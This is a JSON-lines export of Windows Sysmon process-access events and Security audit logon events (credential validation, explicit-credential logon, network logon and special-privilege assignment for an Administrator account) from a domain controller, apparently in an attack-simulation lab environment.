{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-0010CA260400}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-0010CA260400}","TargetProcessId":"2772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.204\r\nSourceProcessGUID: {41C8662E-1F80-5F25-0000-0010CA260400}\r\nSourceProcessId: 2772\r\nSourceThreadId: 3240\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.204","SourceProcessGUID":"{41C8662E-1F80-5F25-0000-0010CA260400}","SourceProcessId":"2772","SourceThreadId":"3240","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220289,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-6178966\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-6178966","Status":"0x0","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220290,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220291,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x43D20\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x43d20","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220292,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x43D20\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x43d20","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
